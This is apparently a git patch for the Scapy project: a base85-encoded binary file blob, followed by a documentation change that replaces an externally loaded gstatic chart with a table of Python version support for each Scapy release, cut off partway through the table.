zYkdCs*X(rp70(Q}OIF`WX}rvnq-+_9W0Dt9qF%z9(Vs4Wo9n-9g$A!wXD1t-DCRl= zvs%GdqN6j=mo8Pr=M9dGPh)0 z31ljD6&7LUH^`9Ctzd1(4w`TdX6Tu2oFlh}6^OUg`RUe+_3bMnGFr0qS2kF>RqIVk zEVSH@HyDa7^x2bkbu9{oPB#n`wmoKsBGzh^(8;ql-f(`Iff>Cm1AFJDxf$2^T$cW>QFSFnRwd&$M^W zhbCUl)Dy0tF{)T4h}tz_0?!r>@QU(Sbxs6)moI*PP_B5}Xv!n>thKP=*jM=$*A)lu zZ+Es+L{&yhO|Cs|&6$b*C^zo#Qto185Z_&Ir4R?x;H84116DDa{hwE^-TzkhUDIFf zzqk5ZP;fHI9?V{cOBHdBrsX=vb}Bi}h`SR}M!-Y8mSzhI`MA46DCctMqN-6 z=UBwSq{E3Qg{?Y$ix*b6%H}HNQ^ie^CFY9R+iNeMJhUuWvabEkO6R7kZJOt3Q{ig! zkk4n&>e`mlYIyce+2y<=K)*uLXiM_Xyb6Qtj@UGv*rRx$(-QwU7Qwo-k* z_51Oom?=raS@nfVPqr%a97*>Us(ne4M>UCF%JUQVVwa_D<(Uv$koEkp#ps57Jc~I=F}bd=C)uZ#(4G??Vb*M7o zLC;G10NWTYg&j?#5j+2XTcP1{Nz<-#BJ~RIn~AibQ!R#>DH+bYlB*)k{oPB$VCFUy zLIYFW`BEAe`2q8eK8mv| zhUNzPI%gODUqr?YsZGJG4tm+Resulv=5PLzQE~pWqdcqNP4Q8Ws@RSJ+6oLpD3M6- z_K%b*Hwl#qR_Qi6$IdUVA;dZCQCMJz)Bey?sGJKW3Fwry^N_cV3CLJ{O7YeqSa>d) z)&r{z-JwI`$FyE09VYX)HKb{I$Mw+pHt}w1q+B#8qm85zueIEPs__a;mR`~3%ykOT z^edt2rys?z+(59${bY!2PUd@~;blIUFqF4F5QQLma0aO|w7!!`S)T?=Q;D;QrwSOs z@D#}*!mJb!KwC)oU_7z@dJOigW4Rn*7gUT2!zn*`o0E(>#|lTft325%4>Ac-c|ZCl zwy*vCGbH{5eSP@@b8H@nA6lPv@6e__tHHsgn?bb<_N2$3)_BznkB5ZkW6-T% z?<@J^`iuFJ87Mou7!C-sHb;Zg%TeO))H3PtR1v(v zmegg<=xoYgR$UKd!?V(_EQtzYaRADh13LSlfFR(kQ*rzQ5={H^D&!u zzdmr@Y5$K`xE~&#%s$5-ZAgGF(Y>oK&KV}&^`Nlh4cOc8=*0f1@Z`NM0GZN1g?i9@N($0gjY=v+ezrG=e-p z#gv(+2)N>crQiie&kO$q#Eu^9vz22S%XK3L`K1J+fenc#o|0V~k^_P~rgr}V-U-%M zh$Ky#3gljkK;#>r=dmHdR5U-R-^d=F>E_5MO5R6E*jkoz=ZL_RleteJPYsQ**TaH#)}s|UZXz* zT~;UXG*f8+kDDh|p|oHS>xXN9MWa*R^4Pkg+5jF3h?RCg)v_Fe>o+ha2x+Img9)!~ z)-46sm9VuEeOiaR@0nJzg@WhThjz8Dhg;-Rca(Mcg-yQeN&qaSpRIX^O^QIX($Ay0OpnDg`D=k$ z@vOY(%*iF%Q_q{bp1k4CQJ*$aJt?roY$N_10l1swFQO#8#zWc1U46?lsTNa6;H&dA zVAo<5tic@Q?5QWy4=x$_9B8c~^i2 zrU1E2YDQAAVc_EHRZ+ML6|CuBCQ}`{*MDRLf|OVNiw7~8f^H^JO`Z}!=7cQm(c)Er z9gPR0i8<^b77Tu|1#kSXQrCyt_8_2IzQ2xJOIfB$e2I=D5rC=+>(y|-kzT#B_x{?j z7Avb)ki=$-eBG2LA+%nsW*ab+evjpM^JCtHB4ZrMOHgq1gm1a?-Z}`Jal0g4gy(^$B+uIZ<_+hq8!KC@`%7l4|85iqFxTvX zq}Cno_v(8N3Oe`7FI4JDQAhffb{@#Q2sjhVE$?A?H^lBb%ziLBCAnpBFzO<;{nO=z zWAL^>@ExN@>Lu>}#|ORg;wsiI>9k<944p>LY zRr%8}@K0c{=>BHA^VmPW2?6_oC&AP}DU~=oZq9?M(h#1K^Q0zZ!IGxbK0z)$+K7TB--^mOm=7sL|N%NlXBX@q+voG+bFAQOQqE3DF_D8v&zZTh>MSONn2qjoF z?P)jd8p{^_eRQJk@X1in+g5?IBc(m^L1eHV;7x|6MLJPG?U(DaW96f$2F0=n&=$L1SveKmwVO#IO5_B_ZSJXkN>PU{fn6%G!< z**kOg zEu3M~9Cup4c@fH6uQS{YWOL-Q{1IoDhFes6TM(TQTxT!YUYT>uzTg&uUHU1f zMxKUA9<%=yO_bwDm~+V@g|dd=FnP@NuR;wG!n1PxVv!dVAlFpov3yp11-Yy|Mi(=l zG?^n2McNn&M_fpFdH182M;1l7D$t+$8d%!;!Sfk<_xT z^pD8O6gk=egDa+yVq(b>-{hnR$7EIH)%qDRen%pekqWntB(5sRr^)LY6+$VkSvVcR zwinWg<5I%fW@B>lri0SX12|!AO%x=CGg){gN)C-56$Ur)f;FxVicf+sHG!4Ajp=-$S6a?g7!{OkW(<;}4gVX{`Z!bqrS_Rei{lkzSdVex3Mv_j zvPu?;w~;0gh{i{SOO=XdX}aLAZQ$`}W|3)m=Yi@rQ~Vc&%d-=TK(atb+GT|k?PNp2 z9dOfHfz+*WVD6lD^g_y6Tj58P++3@PfsUpdNg&!(i$h28a6rK@S)h)D<0a`iAL|{M zSQz98r!Zmh6LPxR`d0D+h;y-*{*?kFK~55mPG12~Y^x*LiRs8%53;=?2_&A#-%?<` zK&$!<3<$ToL1Gj*hF9sLFT0VPuPTDvhs;J#q}yVg??gjxpZKXn2_GQjd9{I^=%>O1 z5_2&|1q!YcQF4dZ&PEFr?W~kjs0yQn13sl1sB(KGGT%C6L`2z{>Dz_4Mt7)KY|3u{Ou`4f>Q;*(BOgqXAr9=l$NQQ?u z4WB=LS7J}4bdx2r)x@oDRWJW=T~lw+L0?)>t!~gxYI`A^IC`BY*_$Py;D@%qoduIK zI##wr_|>l@G(;Lu%xvnE6`z!FHZ77gmp2@-P8@M{e$hmyECU7Pc~dH6?Qj%>O z+Rnl#+WF7qcda#2Vq3F6zLu8iRzmCNx;+h#M#y>pmT`}hWdr2?kOUS-rKkT)NDh{K zj8{0-N6@Ls13;$V@0)JM4^CBam=`@Ii8qC#H7682qf)#JRP^t5$eJfNSjEY$X^Zok zn&~FL6w|IaOHg3JPp8~aTI+WBlbJj5Ez)g3=3pRoq176n<;?g@KXKyOO3qDdH3Q*+ z#AidYn89<%!vni(Cgst19QJC;6-Xu;Fq2AV`=6eVxn#4T4{!8W{wQgEtVDN_0 z@xYDeN^20EqAc1OM*WGgA2-n*N*%vM+JcaY&9SW4`IkkPz7e#gS^F3QjnJ?x_IWT$Z zKx`X1Tm8EUCt%4> zmJcmoQ;eX~L6%BhRW++%+lAtGoxvJ8$^wd0$qQ;sqoAMFI095R+APD~l$`Ykz~!!% zT{|glx0%e8{?KmssmADa_UaSSgKBy3^yfWGr@$o<_cuubcZ$+aOl*pcohoeu*>GOH z3`PapS>^KH&l9JfHUt(Zd1Zv2Ejc|}c(e5y4R#XgDU=JE_2nyT3$m{`y2ul(VfM)G z`ZuX-W=`!!B~I>=j5H(YAc94zk~h+@s<*F7yt>yWdM1_IElI74%P*e@FFVK%nkboz zepu7dMfm!%`1aER{RYp_nd*x=WTuhAqoRIv;SzZrbPN9)J!Eh}q$8s$J)sL*VMua- zb-S0W`xKcZ(YT8?+FMrl4zXKh7nzVEM#fF(w5A^Q3>D}XyX7 zxmn+l&$TP0eRE)3%!=!x&74m-%_CM=?a$~^b2aYv89fEdLTfLIH<{C>d{^GghMA^@ z)AjyLPQ8iq-Z@X7u4hXceq^FAD3;s_4tA)pyWvL-d_}lPF+AVD@id$?PI;3%r>V? z)^EMwfVLtaIQ$ z>JDGDJW)RC@VBhtnv_M{D1D_T)*C&$>@6Do+Nb)qAYH0B-{Gu7?cZxm0zph$mG(Ej1_#;5nxj#ba{#SxCRD$8 z|7|o&Vvxv}KT)r)U06Nd8n+WQpY*uDTk1QPdGT7wWuIOppR=nsvbvF<92a`uZ9xfe zsOyz?P)z~)Cil@hGU_*;t8L?sXSfnrIgcaJcU^Xq-HLi05IU1F+Kl{PkAi!OB> z%B7&IPal##$jhIcrg89q@n#7f_rK;e?H&Q9ELC0Mqv>>YXHS-5PF)fGybP-wWWMN@WKXV!^e%*jXA<@!?14dW!^KZ9pipZ53nT6&T+&kVB)8aC=$jvXT zR@@S|C^fcuoPYaKc9o<@#tZmR{{I>}?|7*HIF8?)yL0Xi-#dGxJ1aY~N4hhQ#MwlJ zBr|)ax`ECR4KV#T9khXv;Xu4Uc%_~WZ) z6NhD>jcQRp?|t>54huy}SReg=6j^75Oui6KDQ#yjD?e&N$;iKdxM8o$95A4pydpZou3YB(OL=+mCpdD;4|} zcnGH5!0bH$GcKZ_&yy+qmP`uNbN&eIZpe!ZVpCFcV>|Xy#-z7&yz*`C}xL1;njd`2wO6ZPKg>&npM%hMUgILgU~?-Jjw z@04GFNo)GLK#xmxgKqvYKs!8*ga2iKOa~!8?n%~2!TGyue?dV{Q8Svn?(EI5UQ{`A zX5qItSV(IF%y4@%9~1UWAJS(`m!-2es&;UY3?xdPxQYV=u*v3kR0x6ct9kxG>X#Kk zqX%&d&F)>aYJ&UJdzil3Y>UWfTncVv?Uajc~zjYN=9Smzetn zrWaQ9P~~iV1QvD;2hk3rK|*0s61t#CcqeZ@M+tW7WYrI& zALb0$^+qlcNuWi|i|s|n0^XB9gE@9T85T_;C9i8vK=j3*vc9~8Am?=F=$l5M-Dt?A zs{Msj1uFXw!bR;x9K=AX`)2)l=%oo4;L3VaDmyNr{}APIT1y_~S_n0^u95&WBO zf(sr!9E3&1_kKQ_HlFx<>f?;JVTtqczwsyBz^OBFO2M+G7?^S>hL+&7It{%BsKIpn(kK#wK(&%=Ma++*0Ff3%03GH6iVwZn$8f1)FY<(7xS zW>ACFu>~}5(j0#tvE$H6w`;5sPa69tSP`v;xpm~(qPH&@|bhdjl}b-2Mp96yYWgQam!3lDLLEDK+w zz_{cFT*o&S1F;7R|LG`mja%@qrf`Sg;5J))ie$*i#?jr^8$~Iwi@1;L{u8qxz=+Ao zAK2Gt3BRQX6yoMsAXFm=9b&;{#1tuS%!u0P&jfYzH`ON*U^*`k`U&hdxMx*??>@<* zFK>=CP#sNvP|A61iqe%Z%1WEKpJ#rM(W!(ccPOpSbh)S=@Sl zW4y{Ml-J)Qnoo$x9@1nx*U4N9b0Uw&CVSQ=vO{DGnq~3dch3XZ;>@0XH@Q0@YlWjC zx|sZ=OvwO?d_i;WhWYjuTSGS`|7om^Hh|F!lx`U`t97J( z4#%}XnQtglY1u4aIK*v$-jpkZs@;%O;S1`u$P$@gDI7Em7NG&qw(0LJQ|z0KMGBW= z3oIRk+p99wu~O9z6?$qu(V5ZHFDIL~U0a@}EwTDq991zYrz=&jn>A6}5Go{9uf1xe zSIeW*_0sfZsBTAhtLWx<=Zbc{s!(s%=~q0bE7tYCwXo^Fc_yyB7PWKcInQg~41E=( zZgI=M@;7?#Rl)OFgm2t>+}T9F?B!Vs_d*MyyG5Tz4I(h9e>#k?qiUcTX7Dy^x!;EC zgY7_^t@g11A#Hz2zf%=$Z@?ATjCmS$pYGH-wVpm>M^p_}ecY(_nKiVsLGqc@4b9f| zYc=iK8K;G57aVSx2C5m=?1;g@>R@V9bt_R<`AqN+lW4UuebpM92N^HznzLKSOLtVd zFxumpTtUluV`gQDl|0H&(HgGs2dgk{Iqyfd)qz_6%|y%Zy!jx${9QGx3J$A7H7h=Q za-ta*QavA%V|{|pI)2$E*@t{Qhphd`N;Svk_7Isn$L?^_ZsUh7$4@Rhz7o+K@=^NI zO8v+`<=_|YaBM1n-OXAz+%90s{<6AV#*hO>-61|apTXx8o|7Ln+QKpr)=;4bV{AFdHB=uYL49qWeZA0?t-wpa~IyLU!1qUxEy|Qb?V}V z`lT)VOTP{uT{;NAbjat%=HSNB=EfP}#;xIwac~!Ca~GO+$7^^@zc^p3ypKDxJ z-@O#z&s|Nq@R9H04(p<61h;v_#k0Gf*1H$%9Xy?T?D|D&_y$J!)kko{iJmRHZqFV3@8@34;lK7O*XL2L_vMVIYGmFz_yIKTVUnm>bLCK$jO~NY zcEdzMy!`3WeIC`t;&>n5l@HNm&etUbI`Wt~@1j^fTId4VAhfh!PG&r)Rl?LqD;CdsP^K>lb@D?0!~_281xg4 zM6!jA%G%~`w=hjOo^(YS#Yn~rcRz}Co%2ykx783v^etA3o%l(zTYK_!Z)1*o`mij! z);~v`R+v3RG-kezzeV`rBL^ha=4<{}SScYBCdLT-an(@n3}8b>KmzW4G(;f9jpWF2 zOxqg@Byxgj&7#2vq7ARnCDJUF*TeMI7~iKvnJTAA951GIAo=9z*StW)!3-uf_G8t! z81GLlku*VT8}=lEbmc+@NxDP82E%DEn`k9wS9wX+`ih;!F2b!0EPS>pLC^eUe$&7X_Jt5ig_2ccpGisT4P&09Wb6}he15zDjRf;Ur14LZj@KOP zqoVaHy#|Qpl^OKwYYzTfFCJyS$2`D9&&La4tQXjv%_avn+7ZhvaGedQe+a!XO1SwS0DxU*dTyA`_3~B$AF(h((w^woCB(_ z#HvGOl9$(Ad$D0u`?%uZ02^3=fz@Mu&x{!qSHstZM9U9NhaDXH!tlP4idyxbd6h_` zv{>6o;d7}xpST#^_vOv}HtTx11x6KsK%FrVtb%%~6~7SRM*>(I(XM2S&z1SGI>_m@ zu}AF2`upGc@4H96OG43pnz8sY14(-g{OyL?Qiqz$@PIZzTH`NBHnx=8?u9*!PZ41G zNTnv>9L9>*Dx8qbgZJ5teVB!a0`IY{_5my3`GkkispIRC?8Ea7Z{$=+6P%HC2*RYXXyC;cbpeA%VXP z^zbJcDZMWgty^MKqm5N2h?vb0^?wMcq5~!0>3$>}x`y1PDd10^bL)BEcGS?+RHCnr zm7$K5iwkB=GWOL5_-)PZ?%-g&ODDs*benC4bCKIw21P6lIkRI&rNM?E+%=>D9rH>o zKs7Q9=~ui~Hk@w5QF+`aBH`*!PuvZo-ncRHV0}Ok{VI8J5%N{co;c2gfQxv(4-Q$z zOpxW~QZFMs*glQ9!Nos(Ab8ISTHoBxQQLtk_`S%nRP@SiAC@A0I02Xf-7z$`!uw>J z{xrHLSCX2cl=sWb6x3aimj4#_qy5A_2Ndx~9CA&P+cb7i z;AJFmOc}y$nl)#p*2exbHLmFMM27ZW;-N~sMVUlT-=bl8!8yA3f^I6Wx7bXdRPZTJ zQ>0O%VOI+wc6+DX#Li4SNCt7&-W2g-jj>zZFZfo)NS9rT)Ky1rOpCLV{9E8nnzNJE z8RV@Hm|_^0k725Rnx1TU(udY+8G0Txe6Qf8wV9Kh%#CKA`{WTso|b_`Gr>3Q^Okgp ztI@d!pIX)VIQ;A+VqP^psIJ{MB85-1Gh4@G&KuXwVTR3To~_=j*%1 z9pXAGH-jHBRtiEHq|uCy2xp3eCo+>o7Nw1WH}$Ux5Bz}n2u=U_(}*h`uig!zq3s<* z-wA^F?%4(Dr%j=L=@&1ce)k2?u3t`&^0xLhCAtCs6)Nw}YJ ztRgBzk)M=u%a!=KK58)K-4xU6uZL8L;ES{T+gYIsUl6tV15(nbvN_8W)ce$4ahrW= zS*hw~dF>8+Cw%#V_+mGFKKoF@&$6Xx=I0b~szW;PZp+=R&Tq->nI~i3CMtw)QYj8q zuNmuz2+MARvy$Qn>(CKMV>@_V^7jNA24ZElU`g~e$St0X4@F9dY^{G86<0~4SJ8Z0 z#66^Hv~VcCoCHTYd##kpt9X|YzvQwfnxX|&k!!8?6-Ayit!wIq+jVOs^*?W4iL!hV zpzppePtW%QP!(qP@MXk;5Dn;mB#`<2^02}CPt$D#1~|i0uTp4Oi{oiW*XzqNhBBj0 zaAMIs(=Co&a6##fg3{J^>Jg^-rFXySgWz@Af7{r8(vb;aK9COTRY#Ugsq&Tzdo8&D zVpkJ%$swCefd})`hhvWiUbQ0qMB{j6o@n_|G6KqZD{#-Nhm=ihQVhpdu=iNAs*q=a zK`6+Qk)!osUQ<|>X7MsPQs<5R_7)vfA&hZ`9m~LMl<$j6|K*RXMtPu1B=i=zG;{Ek zD)lLm#kg)QsLWXFcGyn?-0DZ1P6#K+?zr+zoAvhGqk9uv(=q9ZzV zfAA&itoPD?)9IcoY#e`xCMW;S(>t3JeN)%`0$T<*^mn$Zx=1Eg%qg~#U$ZB9zB)=A zq=$W$c)dqD?12RzgmEkWS+Y9VtL394T|e~+bN2aPlsKnh-K#a&+rH7~e3XlbimjW$ zp|!YBowA@2!gcEzU|JddiW0MHO!xO0AkTS?Aedz>duo)uorbKc9P%XXvh+>fKN0;}`T*Bp8BOmE;Y zGz%FmADILq=B5rYa4i?>>m7vJiVdlz6N1q{901|L+fSe%IFTXf&cI?gXin-$)r?z* zR0jJzLt>thAd{F}O}Jp}DE*UMzvX8<4(F6Yl*+hENhW2}&)%e9KQtz7v?P5POR94M zeCCn_=N-3H;m1^<00_=WH8<>b0NnX6@bg0AfC~V&nO`heImwnc`3Na53)f|*YUF8Q z!I@EtAVgqR)JL!?2LQbWO2y3EB2+*YbMUzGRE0_SiZ?JIgBWE1t8phc_mi5v(|5JB zTeXxP=BG#M~&n6pfO6 zL5L^_76tzTcs5~9jhKg|?DHJ#cziZ&3oI0lc`=wGnQ_5sh|?H^30=;7Bbd$&CNv|` z#cH%4YNr&|zh?T=3#FWdV za0qD%L`u1g&%8{ou}t8%z*$*9z*jI_yX=8op0pf-|7AHXs7&;{AdQ>{Da%#VDGTQ) zR~0UYc2^|ctB@%z(_5+F-Vzl4T_z$2NSI><3d>F=l^-KQ)Xwwh{4S?}g~q}6cy#~` zoeI~aidamUUenE+)jZUF;AVTkmBK0-xhmjE)oKFz)9&q%2LZkht}RDYg|`M6l-(ET zzNRl2D=;4rJ`1dUy$_wg&SiaH?vPr&I(<#02^}3%&4yvb3-jj5opF)jozO5=K7r^Z zgVndP#4`}D0Z<}{@~@2pi-|+198HmsxlzD9Hv~0F_j;80ouuHc+}c0WfR{H-#ht>2 zM^6rfKei3m)I>ig&^~uZkhFn6SA(FDQAz`tr*eoPWzZc>;4$-t{EvKb71ZOGn83)G zfp4{3Weq1Xf*)+wvS9-IaUi^m78u7FDG>HzMwme2WFNmFFhD)Ve!DLC_WXFH6xCne zI&{wTCXAR6WvVC^C7CA>erM&H^FA=L5(=#q7P#Grc?ygcVtWb5e>#*;zw5P(If=K! zuV90|$RS!vk@1e`)WgRCukY8jEl`E7>w3umr=JRQ?ggaZ21qjKEq?TPBgWnoot6~& z)iDa5Q3F2zu1{dMgcvG6z`I@EGL+5vqhrvmDCWf2t?dI#~L7 z-yJx!)X!y;uy)6`u=_ zc^c7jPp|`6mc-DS?yL&22<|?ePXS3X>-j2hOB#4*j1?o7BLTxs=#G0?O?HNVcNMW+`l| zmmAZ=n+0!>2e{{KRT{y(<^dvlxtJs{8V}*`EI^Of#HQrZ+z`sjrN_6rxDV$+$C+%N ziI`y#1L-n%2pG&96mHX1sqcQ_?urdYXFCI(wxAS>9@hTDaWn-m#6h*30h=IpdCC)_ zKj;)WQ*gYe{udCTfMInbz=SULj9$C98Z|DJC_EJ2{Q`x_(umEH9P2(73|4Rj^?m?E zaBNu-g*q0!m^zkdaEg_v;;u{sG??@29jtp1Pf4e+mO_cy2LT^S*S9*JEazbq7_s{S zLk+rPWuY=CLPQ3^cI)88I-ap5_8}L53b2DD;qJR7>OQ5gW0;owE}Ak--6sW-;l>6= z9N{WI4!66G4M8z*u7jtS$(e5zh(us^6!w z-UyXe{3#JD9*bzX1IlD^c%(}f^PD`$R}1Jrf+APwrUIBLLH;{K`yF=K$7RI3^4t34 zupI3K-jCrCo=_Z7ZmuLh+>DtOlW(NCMJOyiklvbMem^#~84jI~tL$myX2hwytA)#K{;dxWGv?A@Sg$j{C>)7NEsU! ztN(J{0tEvrYh<2k>Au+5dvWe*z586AI(+mGPp~xNJEKTb5#hf1oGZA$%A=Ss)oWOm zeZLDcaMZ=}PEv^OkfyPSb4A+Li`?^)ju(KNkJvrA0^Ckxg)8KK-`GU zN)Q`@`i<83GG-m8tt_nB_>!GEj0KOx9*%b3QbN#`at#5tG$p{Gbcm)b9L=>P>beXG zUd|L-O16~q&|WUoU&{aYEnNvPBmgyO%WTAz!cX6dl@x2&JKR--YxI|yqu-)$E+;^Hp_W;e86C?nlDfKxx(Rg{sLL!1XR{ z#%iPgd2C+NnyknA&_!%dmqkJ&(l8k)5ypI&4xgFvyOs>tC%3T+Y;2w9Dc5NFep~!8 z<(8WO=1TF6Ti>aF)_Ky+6YfAuzf-t zE%6lF4g@Q-1O9mrAY1ELcl4XXQWUSZx?er^2@qCwx>rdTP~Pi-x}!g?y!S*!b8mfb zv1={fe8Ab%zIZ=|(|YFdPLtUD?FVyjX+hI$89N3i5$;ie33Cq?G&m|oFqX5Cq*q7D zk6qoPe;($nG4*G$A~4OId2z$%%AdxiLb~Pg*w>Bd=#$luZf{8Ug9b&d1XeQ+jKoI; z`dVx*=@LTL#DAyCg!%2_uBEOG6yn4~8iAyjrgMI(_nedv|fU%$Y zttj-pbj(Zg*2@53q!gJ}91!b=eE`}q#-nANc2t5x!#-ik1R{h^v^~C{Ix(VzdJYVv zV)KL#ZarQHtp7Os0o8}dYc^H@mtZ@jDL%)v?szwPg!}s~l>_z-ZzEc~zQ>yOU@zeLZRkN*3z znkRo`8Gxu*9~MwH1pV}9011oYK)N$g91BkDkr6AL5+yg1U11wuKEGOo-K)!F%! zJZHzsN>6i39XUucJOq-3PBdGG8dczgg5Z$fvq30v;^kJf1tYebz373^SiT*)x>8xL zOu;GG^M#0rJdvibN6LMo5=69&-=f)-Q#|>0!Z)?UEvk|~!FIrBt3QOaMJp&ef}cNvH8 zt?-sTyuBc7XeJX1`H$<&ENQz`b^z;bD9L`_<6dGF>4VK|*SiJ2w<>%FyjF!5Vc|Ac1CO*Aybhkbc0s*-k**=HPLt9CN7NsuhE1vS zsYm{o6L~Qe3iMr!1p|c7SiYB$mnc8GB5~AZb*Bfnh}u!^2?M9A+!>)UQKgrem`abs zc;yDcg2Y!+31yyln@IU-Z1U2VlS|Dk7UMI^v^?@JJ8T2l*O#vd76>RA16QF<`D%G= zbgx`*xNrXwNC)F6d^;NxCv>;OC!yf30BUYAK6hUG+p0!Q!ne{6X+OTy(rbfj^z54R zz?IzKm|UX-4j2DmD&E;IpNjDmCX%cNg<5|7TjFn4;xNfO*K->BjS9Ul(s@D5G1K?u zBe-Z_VjTDnuAdwE)w{aDxhiD*?D2!`3G3q*R;SLLC=MSInQ;AD40AT#NC>*`Eohb? zE49T!3(16BQfNLBT_jI@!8OD1l)_mad7YT%e2w4L|NW45#jFe+MET`&oFVNUK2klE zP`1deV=336QgR*`7CBzc`{BOAYX#?!K&TYR`gU2 zdw(P(?iH!}PLuF_54Rpn=@<`6(CI7#U@AuY9~%RV*WAba_fy21*W;Ap1Ydd6I`~gj z2AIZOf}iQ>t-uB2%m285*fR|o>X(zg(r`0%Bx9}q457fzi=r^1sqR;d*5JhD<6rm^ z6s>D7psa1JpRnRtp7JUg%NeunAh=P&72KsLPbs|Fkf3p) ziHdLZ^1d?8aD(+_ec*^CrLmQ6L=sgkLSCN91mOxJ%Cu9^FjMn5K~)Xfb1 z)r=$o-rSsDlq)OF`h^jk9hVIJX*kwDJBT;1Je97{Z!B)Bd1>Ih$`C zYFL<+OdlIX;hvobr6P!`O2n!lyodP`%G2UGP9IDMRZB7iPan>qRtiWZ@QF9s`jS>L zM+|LXOo+*~2&c_bjLKt_msNQwj2Fa$>9vibTbk?-m~^KgVLdxhI^9 z)S8<)m%kdOsPoU{LV?-`=ZteFYSR64wPWiON%?Qyr#dBaCLjB5&cSoi*`cz-`knuA z*oxdYIj^?2U1=EQFs8(hp{EyZN zoWYv{3zz;)Kv}jzjWx&*U76#_LZ4UfzU41MC*#?A4pCx*bP2S3p8LK}A1jDM`)>+Gar-8nQnzr?qjtBTaWf%goX+)vGVdg1cPGvx{KI&7(GgImno)x7t-bH zFwa#+0);rq{R`8= zaK0*g^T4Y~LC%QoUorRQ)M-o>lGdH*^P@z>07Q(fkKoTPP!6(2YSacrXNWOMWEZ?J zzsYx=wa2R{lNxlMN8u%S+YA^fS+&a}!BuUCgG%0~a}89{QS1eG)h9ZcX0}a&&~~G5 zg-yOhC#%tbVK3QAYyW>rY~wViz54|LMHQlr_>tt`H5<|k>5}oQ-l20{^Bv1U_x9by zL*FiaI(?OY6*_!U1o7m=1Uf{%YL3rYWYPiM!gJMsQu~+F0QbKw>nlY`Q9Qqh=3EV_ zR&j#TUrXGH|3Xp;1PF~u2p3k{VIS`NswEJ|=4Cl^_f^qX^sirpFeOIBKfP}>3gtCl z^N#by{xsunpK%L8x4-weuCjOkCdR1o>Z7k@^KGpVTqO}k#RrWp?CG;-$}Jw(o^3=K zE_GJDib(y@ENc$B-E!KF=bekzcV6Ljjy>LjBE^=uj>$e!KS|%YsjLEr+CvaZd|rxMxQDY7-E2i z5dWA@;(-&y#%Jm6iU}Yn2Q)45B|Q5)tEq5@VBEA&&q!5YpWS~`8LIB@A z10W%af&uZIZ0w3BLHsijhuBh`Bsb1PgnHsqO}o=c;--8t6U1`kJUa-j$?u{IHKO#A zKFV}?WAe1dlGkhzeOiQ&dC1sPE)hLOc?_QfDT_`xlhiJyI96HOet&9~5Wg=;oUNPB z*KLl?JEc296+GNY~B!&#pE!~}Z|D=&_ zxEXOF30p0kvm%b1dxF_}#gRE!PiJ)|FnXH24LyT<)%3V$3|^$P_fZGI-1+)i+6r`^QV@(1+m|Szk z-AXS0o?pxWmmOYO?e7D$LM;a3J7BJ=0_|mpNY%W+#giv1O5;&^#x15-{uX%5iM`k_ zyy7Y*kK*@#`d2RG6P9;Txd@&gza#qyIq@XK&NMQy$XKK$0a57FLh1zybSv_h zDZ=S?{R%Nhe@CjxguzTkf-^##iHY+7T8-{hWx1pz6)`To7pE^5KpzZb`m5x`GRpok zqWcm(LFNv31j4cz+Q^qRQGy^}kqP%EE!AQrxl=P+YNuifr``%r2W!1mX`>ScE7bDK zCG-4JByK%zZKj%^#-bQP+{#+|woR|f8IoFR&+>0sHaIQ-c(Ice;@R;(m1*L3{kLpIwkXcr@+qp^p*+UUVp~vrK2rO zOfl%h;`w~Ck*>Xh0A}n&vS34d)X17%`r05^9Hc)n)SLRFh|-A|E1Z_7?|g4iQ{+u!vt{i4Wk6dQ7E9o^-v~uqwWuUoXPHnmmoCdfaX5|t%txM_ z>*;Gf`6M%EB8;Ii#kf$&STe7F^u~s4jnD=)v=8PCEG9hF<$sIg&&NU?vN?%Gy+Q8u zambkd6I~4^{XAw2p@((vAk3O)+P@odMAs%b)e09QoJDns`*mY$Q;9(`RymWmo$hIf zK7IEt>$FgshF0bqJ?{8@9>vNoL}gt&x#5NRghyAFX9&VUhrB0`KGYu^OPRHQN3%$% zMtOaqe>U%Ow$IeiYB;BcHYqf=D3T__3|;K)&am#QNm~BcA4_q{VLwQ;OPQoA8{eMI z`Sg3Vw0acpoJ5;K3=13kbPz(%b-5N;k-{0H$lk;Qgr2Ky67H?aIdoH+?3}gWNPx+Ukt(BhSVwS~VzTIMCoz}H2sIJLxy@p#GH5ZJv0RLBb!p4fE%|b8 zG6ldPJdSl=V7%cJ@N@f^KiNNLpQ6YUx7EdUm2|0wl%S}32^xclj~#GdN~1CoyqR#= z*quge*vvhKi&olM3VfvOQr$5#+uuSjrCwq)k+|(sNH4+u)2_v=3a#Y393eROJMS%R z5&0=D2~5pYL45Si`)FB+j*N6-ubW^SA40+Z<0%?@)eK|oZEWeQ0;mGhh-^?;$IY}{cdnGeglJA$BXUn%gh%zrAifn26KEzk#%ouZiq z2{w!zh6d>keQsi-nnUGFYNDWiIg=u6wwxd%kC{`A-%Mn6W{M+Ztd0>WaG8iMb;~T?b<(Zk@RiP6^$^5~@tO1|D)DFDL#(3EQ_g=^3M`#^2Ne^Q zlsJuL9UeKxFHOdirJ38(Wv2LhJ{d{nNtm-YAGbGrqvx-s16T`KRnqK2)X2(;S|GRnK69(e71LMD4+1s0IUvt;#jBAtC>u(5OZnLg2oETr=8>{Qrp2%#3 c-C*dXtpk!9-yH%MN2|0+Y&zcY6c9-FfBUq8IRF3v literal 0 HcmV?d00001 From aa136fd774bc63bf90998784e3411d914e6e6ff4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 6 Oct 2022 00:26:18 +0200 Subject: [PATCH 0902/1632] Get rid of gstatic --- doc/scapy/installation.rst | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/doc/scapy/installation.rst b/doc/scapy/installation.rst index 165a9d36e9b..dbed7ee5fbb 100644 --- a/doc/scapy/installation.rst +++ b/doc/scapy/installation.rst @@ -18,12 +18,21 @@ Each of these steps can be done in a different way depending on your platform an Scapy versions ============== -.. raw:: html - -

      - - -
      ++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ +| Scapy version | Python 2.2-2.6 | Python 2.7 | Python 3.4-3.6 | Python 3.7 | Python 3.8 | Python 3.9 | Python 3.10-3.11 | ++===============+================+============+================+============+============+============+==================+ +| 2.3.3 | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ❌ | ++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ +| 2.4.0 | ❌ | ✅ | ✅ | ❌ | ❌ | ❌ | ❌ | ++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ +| 2.4.2 | ❌ | ✅ | ✅ | ✅ | ❌ | ❌ | ❌ | ++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ +| 2.4.3-2.4.4 | ❌ | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | 